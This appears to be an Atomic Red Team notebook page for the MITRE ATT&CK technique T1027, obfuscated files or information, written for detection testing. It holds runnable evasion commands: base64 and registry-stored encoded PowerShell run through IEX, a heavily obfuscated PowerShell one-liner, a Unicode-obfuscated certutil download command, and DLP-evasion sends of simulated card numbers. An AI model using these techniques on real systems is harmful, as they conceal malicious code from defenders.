# T1027 - Obfuscated Files or Information
Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. 

Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. 

Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)

Adversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) 

## Atomic Tests

### Atomic Test #1 - Decode base64 Data into Script
Creates a base64-encoded data file and decodes it into an executable shell script

Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that echoes `Hello from the Atomic Red Team` 
and uname -v

**Supported Platforms:** macos, linux
#### Dependencies:  Run with `sh`!
##### Description: encode the command into base64 file

##### Check Prereq Commands:
```sh
exit 1

```
##### Get Prereq Commands:
```sh
echo "echo Hello from the Atomic Red Team && uname -v" | base64 > /tmp/encoded.dat

```

In [ ]:
Invoke-AtomicTest T1027 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
chmod +x /tmp/art.sh
/tmp/art.sh
```

In [ ]:
Invoke-AtomicTest T1027 -TestNumbers 1

### Atomic Test #2 - Execute base64-encoded PowerShell
Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools.

Upon successful execution, powershell will execute an encoded command and stdout default is "Write-Host "Hey, Atomic!"

**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
$OriginalCommand = 'Write-Host "Hey, Atomic!"'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
powershell.exe -EncodedCommand $EncodedCommand
```

In [ ]:
Invoke-AtomicTest T1027 -TestNumbers 2

### Atomic Test #3 - Execute base64-encoded PowerShell from Windows Registry
Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools.

Upon successful execution, powershell will execute encoded command and read/write from the registry.

**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
$OriginalCommand = 'Write-Host "Hey, Atomic!"'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand

Set-ItemProperty -Force -Path HKCU:Software\Microsoft\Windows\CurrentVersion -Name Debug -Value $EncodedCommand
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:Software\Microsoft\Windows\CurrentVersion Debug).Debug)))"
```

In [ ]:
Invoke-AtomicTest T1027 -TestNumbers 3

### Atomic Test #4 - Execution from Compressed File
Mimic execution of compressed executable. When successfully executed, calculator.exe will open.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe

##### Check Prereq Commands:
```powershell
if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip" -OutFile "$env:temp\T1027.zip"
Expand-Archive -path "$env:temp\T1027.zip" -DestinationPath "$env:temp\temp_T1027.zip\" -Force

```

In [ ]:
Invoke-AtomicTest T1027 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
"%temp%\temp_T1027.zip\T1027.exe"
```

In [ ]:
Invoke-AtomicTest T1027 -TestNumbers 4

### Atomic Test #5 - DLP Evasion via Sensitive Data in VBA Macro over email
Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email.
Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.

**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
Send-MailMessage -From test@corp.com -To test@corp.com -Subject 'T1027_Atomic_Test' -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer 127.0.0.1
```

In [ ]:
Invoke-AtomicTest T1027 -TestNumbers 5

### Atomic Test #6 - DLP Evasion via Sensitive Data in VBA Macro over HTTP
Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP.
Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.

**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
Invoke-WebRequest -Uri 127.0.0.1 -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
```

In [ ]:
Invoke-AtomicTest T1027 -TestNumbers 6

### Atomic Test #7 - Obfuscated Command in PowerShell
This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.

**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
$cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING')  ;   $pz2Sb0  =[TYpE]("{1}{0}{2}"-f'nv','cO','ert')  ;  &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') (  (&("{1}{2}{0}"-f'blE','gET-','vaRIA')  ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] (  $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )
```

In [ ]:
Invoke-AtomicTest T1027 -TestNumbers 7

### Atomic Test #8 - Obfuscated Command Line using special Unicode characters
This is an obfuscated certutil command that when executed downloads a file from the web. Adapted from T1105. Obfuscation includes special options chars (unicode hyphens), character substitution (e.g. ᶠ) and character insertion (including the usage of the right-to-left 0x202E and left-to-right 0x202D override characters).
Reference:
https://wietze.github.io/blog/windows-command-line-obfuscation

**Supported Platforms:** windows
Run it with these steps!
1. Copy the following command into the command prompt after replacing #{remote_file} and #{local_path} with your desired URL and filename.


  certutil —ૹu૰rlࢰca࣢c෯he  –‮spli؅t‮‭ −"൏ᶠ൸" #{remote_file} #{local_path}


2. Press enter to execute the command. You will find the file or webpage you specified saved to the file you specified in the command.


## Detection
Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system). 

Flag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016) 

Obfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection. 

The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network. 

## Shield Active Defense
### Decoy System 
 Configure a computing system to serve as an attack target or experimental environment.   

 A decoy system is a computing resource presented to the adversary in support of active defense.  The underlying system can be real, virtual, or simulated, and can be presented as one of a variety of IT devices including user workstations, servers, networking systems, IOT (embedded devices), mobile systems like phones, etc.
#### Opportunity
In an adversary engagement scenario, there is an opportunity to introduce decoy systems that can influence an adversary's behavior or allow you to observe how they perform a specific task.
#### Use Case
A defender could implement a decoy system to study how and when an adversary obfuscate files and hides information.
#### Procedures
Use an isolated system to visit a suspected compromised website.  Collect any associated scripting code or files dropped onto the system.
Setup a server which appears to be something that is commonly expected within a network, such as web server.